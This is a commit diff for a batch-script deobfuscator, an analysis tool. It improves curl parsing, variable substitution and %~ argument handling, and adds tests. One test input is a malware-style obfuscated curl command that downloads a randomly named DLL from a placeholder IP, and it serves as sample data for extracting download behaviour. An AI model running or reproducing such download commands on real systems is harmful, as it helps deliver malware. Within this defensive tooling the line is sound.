Fix infinite recursion, curl and var substring

Author: gdesmar

batch_deobfuscator/batch_interpreter.py

@@ -270,7 +270,7 @@ def get_value(self, variable):
                         value = f"{s2}{value[value.lower().index(s1[1:].lower())+len(s1)-1:]}"
                     else:
                         pattern = re.compile(re.escape(s1), re.IGNORECASE)
-                        value = pattern.sub(s2, value)
+                        value = pattern.sub(re.escape(s2), value)
             else:
                 # It should be "variable", and interpret the empty echo later, but that would need a better simulator
                 return value
@@ -370,6 +370,8 @@ def interpret_set(self, cmd):
         return (var_name, var_value)
 
     def interpret_curl(self, cmd):
+        # Batch specific obfuscation that is not handled before for echo/variable purposes, can be stripped here
+        cmd = cmd.replace('""', "")
         split_cmd = shlex.split(cmd, posix=False)
         args, unknown = self.curl_parser.parse_known_args(split_cmd[1:])
 
@@ -456,6 +458,10 @@ def interpret_command(self, normalized_comm):
                 self.exec_cmd.append(match.group("cmd").strip('"'))
             return
 
+        if normalized_comm_lower.startswith("setlocal"):
+            # Just so we don't go into the set command
+            return
+
         if normalized_comm_lower.startswith("set"):
             # interpreting set command
             var_name, var_value = self.interpret_set(normalized_comm[3:])
@@ -543,19 +549,31 @@ def normalize_command(self, command):
                 elif char == "%":  # Two % in a row
                     normalized_com += char
                     state = stack.pop()
-                elif char == '"':
-                    if stack[-1] == "str_s":
-                        normalized_com += char
-                        stack.pop()
-                        state = "init"
-                    else:
-                        normalized_com += char
                 elif char == "^":
                     # Do not escape in vars?
                     # state = "escape"
                     # stack.append("var_s")
                     normalized_com += char
-                elif char.isdigit() and len(normalized_com) == variable_start + 1:
+                elif char == "*" and len(normalized_com) == variable_start + 1:
+                    # Assume no parameter were passed
+                    normalized_com = normalized_com[:variable_start]
+                    state = stack.pop()
+                elif char.isdigit() and normalized_com[variable_start:] in [
+                    "%",
+                    "%~",
+                    "%~f",
+                    "%~d",
+                    "%~p",
+                    "%~n",
+                    "%~x",
+                    "%~s",
+                    "%~a",
+                    "%~t",
+                    "%~z",
+                ]:
+                    # https://www.programming-books.io/essential/batch/-percent-tilde-f4263820c2db41e399c77259970464f1.html
+                    # TODO: Better handling of letter combination (i.e. %~xsa0)
+                    # Could also return different values of script.bat if we want to parse the options
                     normalized_com += char
                     if char == "0":
                         value = "script.bat"
@@ -578,13 +596,6 @@ def normalize_command(self, command):
                     state = stack.pop()
                 elif char == "!":
                     normalized_com += char
-                elif char == '"':
-                    if stack[-1] == "str_s":
-                        normalized_com += char
-                        stack.pop()
-                        state = "init"
-                    else:
-                        normalized_com += char
                 elif char == "^":
                     state = "escape"
                     stack.append("var_s_2")

tests/test_FE_DOSfuscation.py

@@ -155,7 +155,7 @@ def test_empty_var():
         # With EnableDelayedExpansion OFF, we keep the ! at the end
         deobfuscator = BatchDeobfuscator()
         logical_line = 'ec%a%ho "Fi%b%nd Ev%c%il!"'
-        expected = 'echo "Find Evil!"'
+        expected = 'echo "Find Evil"'
         normalized_comm = deobfuscator.normalize_command(logical_line)
         assert expected == normalized_comm
 

tests/test_unittests.py

@@ -157,6 +157,10 @@ def test_simple_set_a():
             ('set E^"E"X"P=43"', 'echo *%E"E"X"P%*', 'echo *43"*'),
             ('set E"E^"X"P=43"', 'echo *%E"E^"X"P%*', 'echo *43"*'),
             ("set ^|EXP=43", "echo *%|EXP%*", "echo *43*"),
+            ("set EXP=43", "echo *%EXP:/=\\%*", "echo *43*"),
+            ("set EXP=43/43", "echo *%EXP:/=\\%*", "echo *43\\43*"),
+            ("set EXP=43", "echo *%EXP:\\=/%*", "echo *43*"),
+            ("set EXP=43\\43", "echo *%EXP:\\=/%*", "echo *43/43*"),
             # TODO: Really, how should we handle that?
             # 'set ""EXP=43'
             # 'set'
@@ -335,24 +339,42 @@ def test_single_quote_var_name_rewrite_1():
         assert deobfuscator.variables["'"] == "abbbc"
 
     @staticmethod
-    def test_args():
+    @pytest.mark.parametrize(
+        "cmd, result",
+        [
+            ("echo %0", "echo script.bat"),
+            ("echo %1", "echo "),
+            ("echo %~0", "echo script.bat"),
+            ("echo %~1", "echo "),
+            ("echo %~s0", "echo script.bat"),
+            ("echo %~s1", "echo "),
+            ("echo %~f0", "echo script.bat"),
+            ("echo %~f1", "echo "),
+            ("echo %~d0", "echo script.bat"),
+            ("echo %~d1", "echo "),
+            ("echo %~p0", "echo script.bat"),
+            ("echo %~p1", "echo "),
+            ("echo %~z0", "echo script.bat"),
+            ("echo %~z1", "echo "),
+            ("echo %~a0", "echo script.bat"),
+            ("echo %~a1", "echo "),
+            # ("echo %~xsa0", "echo script.bat"),
+            # ("echo %~xsa1", "echo "),
+            ("echo %3c%3%A", "echo cA"),
+            ("echo %3c%3%A%", "echo c"),
+            ("echo %*", "echo "),
+            ("echo %*a", "echo a"),
+        ],
+    )
+    def test_args(cmd, result):
         deobfuscator = BatchDeobfuscator()
 
-        cmd = "echo %0"
         res = deobfuscator.normalize_command(cmd)
-        assert res == "echo script.bat"
-
-        cmd = "echo %1"
-        res = deobfuscator.normalize_command(cmd)
-        assert res == "echo "
-
-        cmd = "echo %3c%3%A"
-        res = deobfuscator.normalize_command(cmd)
-        assert res == "echo cA"
+        assert res == result
 
-        cmd = "echo %3c%3%A%"
-        res = deobfuscator.normalize_command(cmd)
-        assert res == "echo c"
+    @staticmethod
+    def test_args_with_var():
+        deobfuscator = BatchDeobfuscator()
 
         cmd = "set A=123"
         deobfuscator.interpret_command(cmd)
@@ -470,6 +492,10 @@ def test_for():
                 "curl.exe -o C:\\ProgramData\\output\\output.file 1.1.1.1/file.dat",
                 {"src": "1.1.1.1/file.dat", "dst": "C:\\ProgramData\\output\\output.file"},
             ),
+            (
+                'curl ""http://1.1.1.1/zazaz/p~~/Y98g~~/"" -o 9jXqQZQh.dll',
+                {"src": "http://1.1.1.1/zazaz/p~~/Y98g~~/", "dst": "9jXqQZQh.dll"},
+            ),
         ],
     )
     def test_interpret_curl(cmd, download_trait):
@@ -551,3 +577,33 @@ def test_non_posix_powershell():
         deobfuscator.interpret_command(cmd)
         assert len(deobfuscator.exec_ps1) == 1
         assert deobfuscator.exec_ps1[0] == rb"C:\ProgramData\x64\ISO\x64.ps1"
+
+    @staticmethod
+    def test_anti_recursivity():
+        deobfuscator = BatchDeobfuscator()
+        cmd = 'set "str=a"'
+        deobfuscator.interpret_command(cmd)
+
+        cmd = 'set "str=!str:"=\\"!"'
+        cmd2 = deobfuscator.normalize_command(cmd)
+        deobfuscator.interpret_command(cmd2)
+
+        cmd = "echo %str%"
+        cmd2 = deobfuscator.normalize_command(cmd)
+
+        assert cmd2 == "echo a"
+
+    @staticmethod
+    def test_anti_recursivity_with_quotes():
+        deobfuscator = BatchDeobfuscator()
+        cmd = 'set "str=a"a"'
+        deobfuscator.interpret_command(cmd)
+
+        cmd = 'set "str=!str:"=\\"!"'
+        cmd2 = deobfuscator.normalize_command(cmd)
+        deobfuscator.interpret_command(cmd2)
+
+        cmd = "echo %str%"
+        cmd2 = deobfuscator.normalize_command(cmd)
+
+        assert cmd2 == 'echo a\\"a'